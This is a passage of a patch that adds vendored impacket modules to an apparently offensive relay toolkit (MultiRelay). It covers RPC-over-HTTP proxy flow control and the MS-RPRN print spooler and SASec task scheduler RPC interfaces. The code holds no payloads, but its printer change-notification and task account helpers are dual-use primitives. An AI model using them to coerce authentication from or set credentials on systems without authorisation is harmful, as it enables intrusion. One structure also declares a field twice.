+                response_data += self.rpc_out_recv1(MSRPCHeader._SIZE - len(response_data))
+
+            response_header = MSRPCHeader(response_data)
+
+            # frag_len contains the full length of the packet for both
+            # MSRPC and RTS
+            frag_len = response_header['frag_len']
+
+            # Receiving the full pkt and no more
+            while len(response_data) < frag_len:
+               response_data += self.rpc_out_recv1(frag_len - len(response_data))
+
+            # We need to do the Flow Control procedures
+            #
+            # 3.2.1.1.4
+            # This protocol specifies that only RPC PDUs are subject to the flow control abstract data
+            # model. RTS PDUs and the HTTP request and response headers are not subject to flow control.
+            if response_header['type'] != MSRPC_RTS:
+                self.flow_control(frag_len)
+
+            if handle_rts is True and response_header['type'] == MSRPC_RTS:
+                self.handle_out_of_sequence_rts(response_data)
+            else:
+                return response_data
+
+    def recv(self, forceRecv=0, count=0):
+        return self.rpc_out_read_pkt(handle_rts=True)
+
+    def handle_out_of_sequence_rts(self, response_data):
+        packet = RTSHeader(response_data)
+
+        #print("=========== RTS PKT ===========")
+        #print("RAW: %s" % binascii.hexlify(response_data))
+        #packet.dump()
+        #
+        #pduData = packet['pduData']
+        #numberOfCommands = packet['NumberOfCommands']
+        #
+        #server_cmds = []
+        #while numberOfCommands > 0:
+        #    numberOfCommands -= 1
+        #
+        #    cmd_type = unpack('<L', pduData[:4])[0]
+        #    cmd = COMMANDS[cmd_type](pduData)
+        #    server_cmds.append(cmd)
+        #    pduData = pduData[len(cmd):]
+        #
+        #for cmd in server_cmds:
+        #    cmd.dump()
+        #print("=========== / RTS PKT ===========")
+
+        # 2.2.4.49 Ping RTS PDU
+        if packet['Flags'] == RTS_FLAG_PING:
+            # 3.2.1.2.1 PingTimer
+            #
+            # If the SendingChannel is part of a Virtual Connection in the Outbound Proxy or Client roles, the
+            # SendingChannel maintains a PingTimer that on expiration indicates a PING PDU must be sent to the
+            # receiving channel. The PING PDU is sent to the receiving channel when no data has been sent within
+            # half of the value of the KeepAliveInterval.
+
+            # As we do not do long-term connections with no data transfer,
+            # it means something on the server-side is going wrong.
+            self.rts_ping_received = True
+            LOG.error("Ping RTS PDU packet received. Is the RPC Server alive?")
+
+            # Just in case it's a long operation, let's send PING PDU to IN Channel like in xfreerdp
+            # It's better to send more than one PING packet as it only 20 bytes long
+            packet = hPing()
+            self.send(packet)
+            self.send(packet)
+        # 2.2.4.24 OUT_R1/A2 RTS PDU
+        elif packet['Flags'] == RTS_FLAG_RECYCLE_CHANNEL:
+            raise RPCProxyClientException("The server requested recycling of a virtual OUT channel, " \
+                "but this function is not supported!")
+        # Ignore all other messages, most probably flow control acknowledgments
+        else:
+            pass
+
+    def flow_control(self, frag_len):
+        self.__bytesReceived += frag_len
+        self.__receiverAvailableWindow -= frag_len
+
+        if (self.__receiverAvailableWindow < self.__availableWindowAdvertised // 2):
+            self.__receiverAvailableWindow = self.__availableWindowAdvertised
+            packet = hFlowControlAckWithDestination(FDOutProxy, self.__bytesReceived,
+                self.__availableWindowAdvertised, self.__outChannelCookie)
+            self.send(packet)
+
+    def connect(self):
+        self.create_rpc_in_channel()
+        self.create_rpc_out_channel()
+        self.create_tunnel()
+
+    def disconnect(self):
+        self.close_rpc_in_channel()
+        self.close_rpc_out_channel()
+        self.init_state()
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpcrt.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpcrt.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rprn.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rprn.py
@@ -0,0 +1,525 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-RPRN] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_RPRN = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] 
+            return 'RPRN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'RPRN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.1.1.7 STRING_HANDLE
+STRING_HANDLE = LPWSTR
+class PSTRING_HANDLE(NDRPOINTER):
+    referent = (
+        ('Data', STRING_HANDLE),
+    )
+
+# 2.2.3.1 Access Values
+JOB_ACCESS_ADMINISTER         = 0x00000010
+JOB_ACCESS_READ               = 0x00000020
+JOB_EXECUTE                   = 0x00020010
+JOB_READ                      = 0x00020020
+JOB_WRITE                     = 0x00020010
+JOB_ALL_ACCESS                = 0x000F0030
+PRINTER_ACCESS_ADMINISTER     = 0x00000004
+PRINTER_ACCESS_USE            = 0x00000008
+PRINTER_ACCESS_MANAGE_LIMITED = 0x00000040
+PRINTER_ALL_ACCESS            = 0x000F000C
+PRINTER_EXECUTE               = 0x00020008
+PRINTER_READ                  = 0x00020008
+PRINTER_WRITE                 = 0x00020008
+SERVER_ACCESS_ADMINISTER      = 0x00000001
+SERVER_ACCESS_ENUMERATE       = 0x00000002
+SERVER_ALL_ACCESS             = 0x000F0003
+SERVER_EXECUTE                = 0x00020002
+SERVER_READ                   = 0x00020002
+SERVER_WRITE                  = 0x00020003
+SPECIFIC_RIGHTS_ALL           = 0x0000FFFF
+STANDARD_RIGHTS_ALL           = 0x001F0000
+STANDARD_RIGHTS_EXECUTE       = 0x00020000
+STANDARD_RIGHTS_READ          = 0x00020000
+STANDARD_RIGHTS_REQUIRED      = 0x000F0000
+STANDARD_RIGHTS_WRITE         = 0x00020000
+SYNCHRONIZE                   = 0x00100000
+DELETE                        = 0x00010000
+READ_CONTROL                  = 0x00020000
+WRITE_DAC                     = 0x00040000
+WRITE_OWNER                   = 0x00080000
+GENERIC_READ                  = 0x80000000
+GENERIC_WRITE                 = 0x40000000
+GENERIC_EXECUTE               = 0x20000000
+GENERIC_ALL                   = 0x10000000
+
+# 2.2.3.6.1 Printer Change Flags for Use with a Printer Handle
+PRINTER_CHANGE_SET_PRINTER        = 0x00000002
+PRINTER_CHANGE_DELETE_PRINTER     = 0x00000004
+PRINTER_CHANGE_PRINTER            = 0x000000FF
+PRINTER_CHANGE_ADD_JOB            = 0x00000100
+PRINTER_CHANGE_SET_JOB            = 0x00000200
+PRINTER_CHANGE_DELETE_JOB         = 0x00000400
+PRINTER_CHANGE_WRITE_JOB          = 0x00000800
+PRINTER_CHANGE_JOB                = 0x0000FF00
+PRINTER_CHANGE_SET_PRINTER_DRIVER = 0x20000000
+PRINTER_CHANGE_TIMEOUT            = 0x80000000
+PRINTER_CHANGE_ALL                = 0x7777FFFF
+PRINTER_CHANGE_ALL_2              = 0x7F77FFFF
+
+# 2.2.3.6.2 Printer Change Flags for Use with a Server Handle
+PRINTER_CHANGE_ADD_PRINTER_DRIVER        = 0x10000000
+PRINTER_CHANGE_DELETE_PRINTER_DRIVER     = 0x40000000
+PRINTER_CHANGE_PRINTER_DRIVER            = 0x70000000
+PRINTER_CHANGE_ADD_FORM                  = 0x00010000
+PRINTER_CHANGE_DELETE_FORM               = 0x00040000
+PRINTER_CHANGE_SET_FORM                  = 0x00020000
+PRINTER_CHANGE_FORM                      = 0x00070000
+PRINTER_CHANGE_ADD_PORT                  = 0x00100000
+PRINTER_CHANGE_CONFIGURE_PORT            = 0x00200000
+PRINTER_CHANGE_DELETE_PORT               = 0x00400000
+PRINTER_CHANGE_PORT                      = 0x00700000
+PRINTER_CHANGE_ADD_PRINT_PROCESSOR       = 0x01000000
+PRINTER_CHANGE_DELETE_PRINT_PROCESSOR    = 0x04000000
+PRINTER_CHANGE_PRINT_PROCESSOR           = 0x07000000
+PRINTER_CHANGE_ADD_PRINTER               = 0x00000001
+PRINTER_CHANGE_FAILED_CONNECTION_PRINTER = 0x00000008
+PRINTER_CHANGE_SERVER                    = 0x08000000
+
+# 2.2.3.7 Printer Enumeration Flags
+PRINTER_ENUM_LOCAL       = 0x00000002
+PRINTER_ENUM_CONNECTIONS = 0x00000004
+PRINTER_ENUM_NAME        = 0x00000008
+PRINTER_ENUM_REMOTE      = 0x00000010
+PRINTER_ENUM_SHARED      = 0x00000020
+PRINTER_ENUM_NETWORK     = 0x00000040
+PRINTER_ENUM_EXPAND      = 0x00004000
+PRINTER_ENUM_CONTAINER   = 0x00008000
+PRINTER_ENUM_ICON1       = 0x00010000
+PRINTER_ENUM_ICON2       = 0x00020000
+PRINTER_ENUM_ICON3       = 0x00040000
+PRINTER_ENUM_ICON8       = 0x00800000
+PRINTER_ENUM_HIDE        = 0x01000000
+
+
+# 2.2.3.8 Printer Notification Values
+PRINTER_NOTIFY_CATEGORY_2D  = 0x00000000
+PRINTER_NOTIFY_CATEGORY_ALL = 0x00010000
+PRINTER_NOTIFY_CATEGORY_3D  = 0x00020000
+
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.1.1.4 PRINTER_HANDLE
+class PRINTER_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=b""'),
+    )
+    def getAlignment(self):
+        if self._isNDR64 is True:
+            return 8
+        else:
+            return 4
+
+# 2.2.1.2.1 DEVMODE_CONTAINER
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', BYTE_ARRAY),
+    )
+
+class DEVMODE_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('cbBuf',DWORD),
+        ('pDevMode',PBYTE_ARRAY),
+    )
+
+# 2.2.1.11.1 SPLCLIENT_INFO_1
+class SPLCLIENT_INFO_1(NDRSTRUCT):
+    structure =  (
+        ('dwSize',DWORD),
+        ('pMachineName',LPWSTR),
+        ('pUserName',LPWSTR),
+        ('dwBuildNum',DWORD),
+        ('dwMajorVersion',DWORD),
+        ('dwMinorVersion',DWORD),
+        ('wProcessorArchitecture',USHORT),
+    )
+
+class PSPLCLIENT_INFO_1(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_1),
+    )
+
+# 2.2.1.11.2 SPLCLIENT_INFO_2
+class SPLCLIENT_INFO_2(NDRSTRUCT):
+    structure =  (
+        ('notUsed',ULONGLONG),
+    )
+
+class PSPLCLIENT_INFO_2(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_2),
+    )
+# 2.2.1.11.3 SPLCLIENT_INFO_3
+class SPLCLIENT_INFO_3(NDRSTRUCT):
+    structure =  (
+        ('cbSize',UINT),
+        ('dwFlags',DWORD),
+        ('dwFlags',DWORD),
+        ('pMachineName',LPWSTR),
+        ('pUserName',LPWSTR),
+        ('dwBuildNum',DWORD),
+        ('dwMajorVersion',DWORD),
+        ('dwMinorVersion',DWORD),
+        ('wProcessorArchitecture',USHORT),
+        ('hSplPrinter',ULONGLONG),
+    )
+
+class PSPLCLIENT_INFO_3(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_3),
+    )
+# 2.2.1.2.14 SPLCLIENT_CONTAINER
+class CLIENT_INFO_UNION(NDRUNION):
+    commonHdr = (
+        ('tag', ULONG),
+    )
+    union = {
+        1 : ('pClientInfo1', PSPLCLIENT_INFO_1),
+        2 : ('pNotUsed1', PSPLCLIENT_INFO_2),
+        3 : ('pNotUsed2', PSPLCLIENT_INFO_3),
+    }
+
+class SPLCLIENT_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('Level',DWORD),
+        ('ClientInfo',CLIENT_INFO_UNION),
+    )
+
+
+# 2.2.1.13.2 RPC_V2_NOTIFY_OPTIONS_TYPE
+class USHORT_ARRAY(NDRUniConformantArray):
+    item = '<H'
+
+class PUSHORT_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', USHORT_ARRAY),
+    )
+
+class RPC_V2_NOTIFY_OPTIONS_TYPE(NDRSTRUCT):
+    structure =  (
+        ('Type',USHORT),
+        ('Reserved0',USHORT),
+        ('Reserved1',DWORD),
+        ('Reserved2',DWORD),
+        ('Count',DWORD),
+        ('pFields',PUSHORT_ARRAY),
+    )
+
+class PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', RPC_V2_NOTIFY_OPTIONS_TYPE),
+    )
+
+# 2.2.1.13.1 RPC_V2_NOTIFY_OPTIONS
+class RPC_V2_NOTIFY_OPTIONS(NDRSTRUCT):
+    structure =  (
+        ('Version',DWORD),
+        ('Reserved',DWORD),
+        ('Count',DWORD),
+        ('pTypes',PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY),
+    )
+
+class PRPC_V2_NOTIFY_OPTIONS(NDRPOINTER):
+    referent = (
+        ('Data', RPC_V2_NOTIFY_OPTIONS),
+    )
+
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.2.1 RpcEnumPrinters (Opnum 0)
+class RpcEnumPrinters(NDRCALL):
+    opnum = 0
+    structure = (
+       ('Flags', DWORD),
+       ('Name', STRING_HANDLE),
+       ('Level', DWORD),
+       ('pPrinterEnum', PBYTE_ARRAY),
+       ('cbBuf', DWORD),
+    )
+
+class RpcEnumPrintersResponse(NDRCALL):
+    structure = (
+       ('pPrinterEnum', PBYTE_ARRAY),
+       ('pcbNeeded', DWORD),
+       ('pcReturned', DWORD),
+       ('ErrorCode', ULONG),
+    )
+# 3.1.4.2.2 RpcOpenPrinter (Opnum 1)
+class RpcOpenPrinter(NDRCALL):
+    opnum = 1
+    structure = (
+       ('pPrinterName', STRING_HANDLE),
+       ('pDatatype', LPWSTR),
+       ('pDevModeContainer', DEVMODE_CONTAINER),
+       ('AccessRequired', DWORD),
+    )
+
+class RpcOpenPrinterResponse(NDRCALL):
+    structure = (
+       ('pHandle', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.2.9 RpcClosePrinter (Opnum 29)
+class RpcClosePrinter(NDRCALL):
+    opnum = 29
+    structure = (
+       ('phPrinter', PRINTER_HANDLE),
+    )
+
+class RpcClosePrinterResponse(NDRCALL):
+    structure = (
+       ('phPrinter', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.10.4 RpcRemoteFindFirstPrinterChangeNotificationEx (Opnum 65)
+class RpcRemoteFindFirstPrinterChangeNotificationEx(NDRCALL):
+    opnum = 65
+    structure = (
+       ('hPrinter', PRINTER_HANDLE),
+       ('fdwFlags', DWORD),
+       ('fdwOptions', DWORD),
+       ('pszLocalMachine', LPWSTR),
+       ('dwPrinterLocal', DWORD),
+       ('pOptions', PRPC_V2_NOTIFY_OPTIONS),
+    )
+
+class RpcRemoteFindFirstPrinterChangeNotificationExResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.2.14 RpcOpenPrinterEx (Opnum 69)
+class RpcOpenPrinterEx(NDRCALL):
+    opnum = 69
+    structure = (
+       ('pPrinterName', STRING_HANDLE),
+       ('pDatatype', LPWSTR),
+       ('pDevModeContainer', DEVMODE_CONTAINER),
+       ('AccessRequired', DWORD),
+       ('pClientInfo', SPLCLIENT_CONTAINER),
+    )
+
+class RpcOpenPrinterExResponse(NDRCALL):
+    structure = (
+       ('pHandle', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0  : (RpcEnumPrinters, RpcEnumPrintersResponse),
+    1  : (RpcOpenPrinter, RpcOpenPrinterResponse),
+    29 : (RpcClosePrinter, RpcClosePrinterResponse),
+    65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
+    69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hRpcOpenPrinter(dce, printerName, pDatatype = NULL, pDevModeContainer = NULL, accessRequired = SERVER_READ):
+    """
+    RpcOpenPrinter retrieves a handle for a printer, port, port monitor, print job, or print server.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244808.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param string printerName: A string for a printer connection, printer object, server object, job object, port
+    object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
+    (IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
+    call (RPC) binds to, and it MUST uniquely identify a print server on the network.
+    :param string pDatatype: A string that specifies the data type to be associated with the printer handle.
+    :param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
+    DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
+    :param int accessRequired: The access level that the client requires for interacting with the object to which a
+    handle is being opened.
+
+    :return: a RpcOpenPrinterResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcOpenPrinter()
+    request['pPrinterName'] = checkNullString(printerName)
+    request['pDatatype'] = pDatatype
+    if pDevModeContainer is NULL:
+        request['pDevModeContainer']['pDevMode'] = NULL
+    else:
+        request['pDevModeContainer'] = pDevModeContainer
+
+    request['AccessRequired'] = accessRequired
+    return dce.request(request)
+
+def hRpcClosePrinter(dce, phPrinter):
+    """
+    RpcClosePrinter closes a handle to a printer object, server object, job object, or port object.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244768.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param PRINTER_HANDLE phPrinter: A handle to a printer object, server object, job object, or port object.
+
+    :return: a RpcClosePrinterResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcClosePrinter()
+    request['phPrinter'] = phPrinter
+    return dce.request(request)
+
+
+def hRpcOpenPrinterEx(dce, printerName, pDatatype=NULL, pDevModeContainer=NULL, accessRequired=SERVER_READ,
+                      pClientInfo=NULL):
+    """
+    RpcOpenPrinterEx retrieves a handle for a printer, port, port monitor, print job, or print server
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244809.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param string printerName: A string for a printer connection, printer object, server object, job object, port
+    object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
+    (IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
+    call (RPC) binds to, and it MUST uniquely identify a print server on the network.
+    :param string pDatatype: A string that specifies the data type to be associated with the printer handle.
+    :param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
+    DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
+    :param int accessRequired: The access level that the client requires for interacting with the object to which a
+    handle is being opened.
+    :param SPLCLIENT_CONTAINER pClientInfo: This parameter MUST adhere to the specification in SPLCLIENT_CONTAINER Parameters.
+
+    :return: a RpcOpenPrinterExResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcOpenPrinterEx()
+    request['pPrinterName'] = checkNullString(printerName)
+    request['pDatatype'] = pDatatype
+    if pDevModeContainer is NULL:
+        request['pDevModeContainer']['pDevMode'] = NULL
+    else:
+        request['pDevModeContainer'] = pDevModeContainer
+
+    request['AccessRequired'] = accessRequired
+    if pClientInfo is NULL:
+        raise Exception('pClientInfo cannot be NULL')
+
+    request['pClientInfo'] = pClientInfo
+    return dce.request(request)
+
+
+def hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, hPrinter, fdwFlags, fdwOptions=0, pszLocalMachine=NULL,
+                                                   dwPrinterLocal=0, pOptions=NULL):
+    """
+    creates a remote change notification object that monitors changes to printer objects and sends change notifications
+    to a print client using either RpcRouterReplyPrinter (section 3.2.4.1.2) or RpcRouterReplyPrinterEx (section 3.2.4.1.4)
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244813.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param PRINTER_HANDLE hPrinter: A handle to a printer or server object.
+    :param int fdwFlags: Flags that specify the conditions that are required for a change notification object to enter a signaled state.
+    :param int fdwOptions: The category of printers for which change notifications are returned.
+    :param string pszLocalMachine: A string that represents the name of the client computer.
+    :param int dwPrinterLocal: An implementation-specific unique value that MUST be sufficient for the client to determine
+    whether a call to RpcReplyOpenPrinter by the server is associated with the hPrinter parameter in this call.
+    :param RPC_V2_NOTIFY_OPTIONS pOptions:  An RPC_V2_NOTIFY_OPTIONS structure that specifies printer or job members that the client listens to for notifications.
+
+    :return: a RpcRemoteFindFirstPrinterChangeNotificationExResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcRemoteFindFirstPrinterChangeNotificationEx()
+
+    request['hPrinter'] = hPrinter
+    request['fdwFlags'] = fdwFlags
+    request['fdwOptions'] = fdwOptions
+    request['dwPrinterLocal'] = dwPrinterLocal
+    if pszLocalMachine is NULL:
+        raise Exception('pszLocalMachine cannot be NULL')
+    request['pszLocalMachine'] = checkNullString(pszLocalMachine)
+    request['pOptions'] = pOptions
+    return dce.request(request)
+
+def hRpcEnumPrinters(dce, flags, name = NULL, level = 1):
+    """
+    RpcEnumPrinters enumerates available printers, print servers, domains, or print providers.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244794.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param int flags: The types of print objects that this method enumerates. The value of this parameter is the
+    result of a bitwise OR of one or more of the Printer Enumeration Flags (section 2.2.3.7).
+    :param string name: NULL or a server name parameter as specified in Printer Server Name Parameters (section 3.1.4.1.4).
+    :param level: The level of printer information structure.
+
+    :return: a RpcEnumPrintersResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcEnumPrinters()
+    request['Flags'] = flags
+    request['Name'] = name
+    request['pPrinterEnum'] = NULL
+    request['Level'] = level
+    bytesNeeded = 0
+    try:
+        dce.request(request)
+    except DCERPCSessionError as e:
+        if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
+            raise
+        bytesNeeded = e.get_packet()['pcbNeeded']
+
+    request = RpcEnumPrinters()
+    request['Flags'] = flags
+    request['Name'] = name
+    request['Level'] = level
+
+    request['cbBuf'] = bytesNeeded
+    request['pPrinterEnum'] = b'a' * bytesNeeded
+    return dce.request(request)
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rrp.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rrp.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/samr.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/samr.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/sasec.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/sasec.py
@@ -0,0 +1,175 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] SASec Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_SASEC  = uuidtup_to_bin(('378E52B0-C0A9-11CF-822D-00AA0051E40F','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+SASEC_HANDLE = WSTR
+PSASEC_HANDLE = LPWSTR
+
+MAX_BUFFER_SIZE = 273
+
+# 3.2.5.3.4 SASetAccountInformation (Opnum 0)
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x40000
+
+################################################################################
+# STRUCTURES
+################################################################################
+class WORD_ARRAY(NDRUniConformantArray):
+    item = '<H'
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.3.4 SASetAccountInformation (Opnum 0)
+class SASetAccountInformation(NDRCALL):
+    opnum = 0
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszJobName', WSTR),
+        ('pwszAccount', WSTR),
+        ('pwszPassword', LPWSTR),
+        ('dwJobFlags', DWORD),
+    )
+
+class SASetAccountInformationResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.5 SASetNSAccountInformation (Opnum 1)
+class SASetNSAccountInformation(NDRCALL):
+    opnum = 1
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszAccount', LPWSTR),
+        ('pwszPassword', LPWSTR),
+    )
+
+class SASetNSAccountInformationResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.6 SAGetNSAccountInformation (Opnum 2)
+class SAGetNSAccountInformation(NDRCALL):
+    opnum = 2
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('ccBufferSize', DWORD),
+        ('wszBuffer', WORD_ARRAY),
+    )
+
+class SAGetNSAccountInformationResponse(NDRCALL):
+    structure = (
+        ('wszBuffer',WORD_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.7 SAGetAccountInformation (Opnum 3)
+class SAGetAccountInformation(NDRCALL):
+    opnum = 3
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszJobName', WSTR),
+        ('ccBufferSize', DWORD),
+        ('wszBuffer', WORD_ARRAY),
+    )
+
+class SAGetAccountInformationResponse(NDRCALL):
+    structure = (
+        ('wszBuffer',WORD_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (SASetAccountInformation, SASetAccountInformationResponse),
+ 1 : (SASetNSAccountInformation, SASetNSAccountInformationResponse),
+ 2 : (SAGetNSAccountInformation, SAGetNSAccountInformationResponse),
+ 3 : (SAGetAccountInformation, SAGetAccountInformationResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hSASetAccountInformation(dce, handle, pwszJobName, pwszAccount, pwszPassword, dwJobFlags=0):
+    request = SASetAccountInformation()
+    request['Handle'] = handle
+    request['pwszJobName'] = checkNullString(pwszJobName)
+    request['pwszAccount'] = checkNullString(pwszAccount)
+    request['pwszPassword'] = checkNullString(pwszPassword)
+    request['dwJobFlags'] = dwJobFlags
+    return dce.request(request)
+
+def hSASetNSAccountInformation(dce, handle, pwszAccount, pwszPassword):
+    request = SASetNSAccountInformation()
+    request['Handle'] = handle
+    request['pwszAccount'] = checkNullString(pwszAccount)
+    request['pwszPassword'] = checkNullString(pwszPassword)
+    return dce.request(request)
+
+def hSAGetNSAccountInformation(dce, handle, ccBufferSize = MAX_BUFFER_SIZE):
+    request = SAGetNSAccountInformation()
+    request['Handle'] = handle
+    request['ccBufferSize'] = ccBufferSize
+    for _ in range(ccBufferSize):
+        request['wszBuffer'].append(0)
+    return dce.request(request)
+
+def hSAGetAccountInformation(dce, handle, pwszJobName, ccBufferSize = MAX_BUFFER_SIZE):
+    request = SAGetAccountInformation()
+    request['Handle'] = handle
+    request['pwszJobName'] = checkNullString(pwszJobName)
+    request['ccBufferSize'] = ccBufferSize
+    for _ in range(ccBufferSize):
+        request['wszBuffer'].append(0)
+    return dce.request(request)
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/scmr.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/scmr.py
